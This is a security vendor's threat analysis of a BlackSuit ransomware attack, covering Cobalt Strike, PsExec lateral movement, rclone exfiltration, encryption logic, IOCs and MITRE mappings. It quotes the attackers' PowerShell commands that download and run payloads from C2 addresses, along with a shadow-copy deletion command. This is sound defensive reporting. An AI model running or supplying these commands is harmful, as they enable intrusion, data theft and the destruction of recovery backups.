BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption

Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, Cybereason Security Services investigates a BlackSuit ransomware attack we recently observed that represents a significant threat to organizations, leveraging tools like Cobalt Strike for command and control (C2), rclone for data exfiltration, and BlackSuit ransomware for file encryption.

KEY points 

  • In a recent ransomware attack observed by our security services team, we noticed unique TTPs related to the BlackSuit ransomware group
  • BlackSuit is a ransomware group that emerged in mid-2023, and is widely believed to be a rebrand or spin-off of the Royal ransomware gang, which itself evolved from Conti, a notorious Russian-speaking ransomware group. 
  • The BlackSuit ransomware group used Cobalt Strike as its primary attack tool, combined with other tools like rclone, and/or windows processes like RDP, psexec, vssadmin during the attack.  
  • Unlike traditional ransomware attacks, BlackSuit ransomware group is observed to exfiltrate and delete parts of the targeted data, then proceed with file encryption. This helps decrease the encryption target and results in a speedier attack flow.    
  • Sophisticated and multi-stage operation aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.
  • Unusual use of -nomutex flag in BlackSuit ransomware execution to allow multiple instances.

 

introduction

Our team recently observed a ransomware attack performed by the BlackSuit ransomware group that highlighted new methods employed by the threat actor and the impact on the affected organization.  

BlackSuit ransomware is a recent evolution of the Royal ransomware family. It leverages various sophisticated tools for lateral movement, data exfiltration, and encryption. 


image15BlackSuit Execution Flowchart

Returning to the attention of the public in 2024,the BlackSuit ransomware group is an emerging successor to the notorious Royal ransomware. BlackSuit ransomware group has shown sophisticated attack methods that utilize tools including remote command execution (psexec.exe), red-team penetration testing tool (Cobalt Strike), remote access and management (RDP), command-line tool for syncing and transferring files (rclone) and more. The ransom demands have ranged from roughly $1 million to $ 10 million USD, often requesting payment in Bitcoin. Unlike many ransomware groups, the initial ransom amount is not stated in the initial ransom note, but requires direct interaction with the threat actor through a TOR browser for ransom payments and negotiations. 

TECHNICAL ANALYSIS

During their attack, the BlackSuit ransomware group leveraged cobalt strike beacons to move laterally and make C2 connections, as well as used BlackSuit ransomware to encrypt data.

Attack Flow Breakdown

The initial access vector for this attack remains unknown, as our observations indicate that the first connections to the affected machines originated from a device without a Cybereason sensor.

Cobalt Strike is observed to be the primary attack tool utilized by BlackSuit ransomware. In our investigation, we have categorized several behaviors related to Cobalt Strike. 

Lateral Movement

BlackSuit ransomware is widely reported to utilize RDP, SMB, and PsExec.exe for moving laterally within the environment. We have detected and investigated instances particularly utilizing PsExec.exe and remote procedure call (RPC), which can be seen in the screenshot below.

Utilizing PsExec.exe

Cybereason observed use of PsExec.exe to execute remote commands that attempt to copy Cobalt Strike Beacon vm.dll and vm80.dll onto the (C:\Windows\Temp) folder of other machines in the environment. Furthermore, trying to execute and call the function ExportFunc64 from the beacons. 

Utilizing Remote Procedure call (RPC) and Other Windows Functions

Cybereason observed execution of (Configure-SMRemoting.exe) on one of the affected devices, which allows for remote control. Remote services were created using RPC (MS-SCMR RCreateService) using System privileges. In addition, we noted multiple binaries with atypical naming conventions were executed from network share, some of them resulted in (rundll32) injecting code into (wuaclt.exe) and scanning the whole internal network.  

  • \\10.1.xxx.xxx\ADMIN$\frdke23.exe

There were 5 other executables that were observed with similar atypical naming conventions and executed in the same way.

image3

Lateral Movement activity detected in Cybereason EDR

Command and Control (C2)

Cobalt Strike Beacon Downloading 

Cybereason has observed usage of powershell commands to connect to C2 IP address (184.174.96[.]71) to download (file.ext) and save them as vm.dll and vm80.dll. They have been identified as Cobalt Strike Beacon through file hash reputation. 

Executed PowerShell commands are as follows: 

  • “PowerShell.exe” invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll
  • “PowerShell.exe” invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm80.dll

Malicious Payload Download

Originating from PsExec.exe, Powershell commands were executed to connect to a compromised internal IP address, downloading malicious payload and rename it as (b.exe), and renamed it to a different name again later on. We have identified this to be the BlackSuit ransomware payload. Multiple malicious activities like network scanning and file deletion were also observed. We will be discussing its malicious behavior more in the Impact section. 

  • "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -command "(new-object net.webclient).downloadfile('http://10.1.xxx.xxx:8088/yyy.exe', 'c:\programdata\b.exe'); c:\programdata\b.exe -id LE2OYvCXLI2PIN66LmldgMRLBbcXWb1U -nomutex"

Unlike typical ransomware behavior, which uses CreateMutex to avoid re-infection or duplication, the -nomutex flag disables mutex creation. This suggests a possible shift in tactic, enabling multiple concurrent executions — potentially for redundancy, faster encryption across sessions, or to bypass mutex-based detections and sandbox limitations.

In addition, another file was observed in the environment and used for ransomware-related behaviors. This is also identified as BlackSuit ransomware payload since it shares the same file hash with b.exe.

Second Malicious Payload vmware.dll Downloaded

Originated from suspicious executables in the network share folder (\\10.1.xxx.xxx\ADMIN$\xxx.exe), rundll32.exe was spawned and connected to a C2 IP address (184[.]174[.]96[.]71). Consequently, PowerShell commands were executed connecting to C2 IP address (180[.]131[.]145[.]85:8098) to download malicious payload (file.ext) and renamed to (vmware.dll). It was then loaded and executed by (rundll32.exe) through the below command line 

  • “rundll32 vmware.dll,StartW”.
  • Powershell commandline used -> invoke-webrequest hxxp[://]180[.]131[.]145[.]85:8098/download/file[.]ext -OutFile vmware.dll

Impact

LSASS Credential Access and Dumping

The Cobalt Strike tool itself is known to leverage tools like Mimikatz or CreBandit for various credential dumping behaviors. 

Rundll32.exe is observed connecting to multiple malicious domains/IPs with the naming convention of xxx.misstallion[.]com, while loading Cobalt Strike beacon vm.dll and vm80.dll. Subsequently, it had conducted Anonymous RWX code injection into wuauclt.exe and led to accessing and creating LSASS credentials dump files. 

image10Lssas dumping activity detected in Cybereason EDR

Data Exfiltration 
rclone.exe was observed to be renamed into vmware.exe and utilized in this incident. Rclone is a free, open-source command-line tool that allows users to copy, sync, encrypt, and manage files between cloud storage and your local system. 

Executed from a network shared folder, a2e6ee5.exe spawned rundll32.exe, cmd.exe, and executed vmware.exe/rclone.exe connecting to multiple C2 domains and IP addresses. This is believed to be the data exfiltration behavior part of the attack. Roughly 60 GB of data was observed in transmission. 

image5

Data Exfiltration activity detected in Cybereason EDR

Data Deletion Through vssadmin.exe

PowerShell was observed downloading malicious payload yyy.exe and renaming it to b.exe. b.exe was executed and observed to conduct network scanning, and lead to vssadmin.exe to delete file shadow copies. The exact PowerShell command used is below: 

  • Vssadmin.exe /c vssadmin delete shadows /all /quiet

image4Data deletion activity detected in Cybereason EDR

File Enumeration and Encryption Logic

After the backups were  deleted, BlackSuit ransomware set its exclusion paths (the files or directories spared from file encryption). The following file extensions are excluded from being encrypted:

.BlackSuit
.exe
.dll
README.BlackSuit.txt

image9

Code Snippet Of file enumeration and encryption logic

It then avoids encrypting critical system directories and network shares,  likely to reduce the risk of breaking system functionality.
"Windows" (prevents encrypting system files).
"IPC$" (avoids breaking IPC mechanisms).
"ADMIN$" (prevents issues with admin shares).
image8

Code Snippet Of Checking Other Exclusions

Encryption of Data and Leaving Ransom Notes

BlackSuit ransomware is known for its dual approach of data encryption and data deletion, compared to traditional ransomware malware that only focus on data deletion. Such a partial encryption method allows the threat actor to decide a specific percentage of data to encrypt, which helps evade detection and significantly improves ransomware speed. 

From the BlackSuit ransomware payload, we were able to detect file events that indicate encryption behavior and ransom notes creation. 

image2Encrypted File events detected in Cybereason EDR

image12Code Snippet Of string prep for ransom note

This function copies the wide string "README.BlackSuit.txt" (20 characters) into a dynamically allocated or preallocated internal buffer.

It’s prepping this string, likely to write or drop the ransom note.

image11Code Snippet Of Hardcoded ransom note

This function writes or stores the ransom message body (in cleartext), registers a cleanup or exit routine, is likely called after the ransom filename is set (README.BlackSuit.txt from the earlier function), and is part of the setup routine for dropping the ransom note on disk.This function writes or stores the ransom message body (in cleartext), registers a cleanup or exit routine, is likely called after the ransom filename is set (README.BlackSuit.txt from the earlier function), and is part of the setup routine for dropping the ransom note on disk.

Conclusion

This BlackSuit ransomware attack demonstrated a sophisticated and multi-stage operation aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.

As part of the data exfiltration phase, the attacker leveraged a renamed version of the legitimate rclone utility to covertly transfer sensitive files to a remote location, thereby compromising confidentiality. This step highlighted the attacker’s ability to blend malicious activity with legitimate processes, making detection more challenging.

This attack underscores the importance of robust security measures, including network segmentation and vigilance against the abuse of legitimate tools for malicious purposes. A comprehensive security strategy is essential to prevent and mitigate the impact of such advanced threats.

IOC IOC Type Description

d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b

SHA-256

Vm80.dll
Cobalt Strike Beacon

69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03

SHA-256

Vm.dll
Cobalt Strike Beacon

0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298

SHA-256

rclone.exe disguised as vmware.exe. Used for data exfiltration in the incident. 

180[.]131[.]145[.]85

IP address

C2 IP address

82.192.88[.]95

IP address

C2 IP address

88[.]119[.]175[.]194

IP address

C2 IP address

184.174.96[.]71

IP address

C2 IP address

misstallion[.]com

C2 Domain

C2 Domain

Store.misstallion[.]com

C2 Domain

C2 Domain

mail.misstallion[.]com

C2 Domain

C2 Domain

store[.]beamofthemoon[.]com

C2 Domain

C2 Domain

Mail[.]beamofthemoon[.]com

C2 Domain

C2 Domain

beamofthemoon[.]com

C2 Domain

C2 Domain

mail[.]beamofthemoon[.]com

C2 Domain

C2 Domain

mail[.]kiddlanka[.]com

C2 Domain

C2 Domain

kiddlanka[.]com

C2 Domain

C2 Domain

 

 

Tactic

Techniques / Sub-Techniques

Summary

TA0002-Execution

T1059- Command and scripting interpreter: PowerShell

PowerShell downloading Cobalt Strike beacon, and other malicious payload

TA0008-Lateral Movement

T1021.002: Remote Services: SMB/Windows Admin Shares

Lateral movement from psexec.exe

TA0008-Lateral Movement

T1569.002: System Services: Service Execution

Lateral movement from psexec.exe

TA0008-Lateral Movement

T1021-Remote Services

Lateral movement from RPC

T1021 – Remote Desktop Protocol (RDP)

T1136.001 – Create Account: Local Account

Adds an existing user (Administrator) to the Remote Desktop Users group, enabling RDP access.

T1082 – System Information Discovery

T1082 – System Information Discovery

Gathering details about installed software, specifically security products.

T1562 - Impair Defenses

T1562.001 - Disable or Modify Tools

Uninstall a product (probably security software). 

TA0011-Command and Control

T1105 – Ingress Tool Transfer

PowerShell downloading Cobalt Strike beacon, (vmware.dll)(vm.dll)(vm80.dll)(xxx.exe)(yyy.exe) and other payloads.

TA0006-Credential Access

T1003.001 LSASS Memory

Cobalt Strike beacon lead to LSASS credential access and dumping

TA0010-Exfiltration 

T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage

Data exfiltration through rclone.exe

TA0005-Defense Evasion 

T1614-System Location Discovery 

Avoids encrypting system directories and network shares like "Windows", "IPC$", and "ADMIN$".

TA0040-Impact

T1490-Inhibit System Recovery

Deletes Volume Shadow Copies (vssadmin.exe) to prevent recovery.

A0040-Impact

T1486-Data Encrypted for impact

Data encryption by BlackSuit ransomware payload

 

Mahadev Joshi 
Senior Security Analyst, Cybereason Global SOC
image13Mahadev Joshi is a Security Analyst with the Cybereason Global SOC team. He is passionate about cybersecurity and malware analysis, with a focus on understanding and countering advanced threats. He is  eager to learn more and stay ahead of emerging threats. Mahadev has a Bachelor of science in Information Technology.

 

Kengwei Lin 
Senior Security Analyst, Cybereason Global SOC
image7Kengwei Lin is a Security Analyst with the Cybereason Global SOC team. He works as a SOC analyst and investigates security events on a daily task. Passionate in eagerness in incident investigation/response, he is excited in learning de-obfuscation/de-coding techniques, malware TTP, and other Cybersecurity trends.

Cybereason Security Services Team
About the Author

Cybereason Security Services Team

All Posts by Cybereason Security Services Team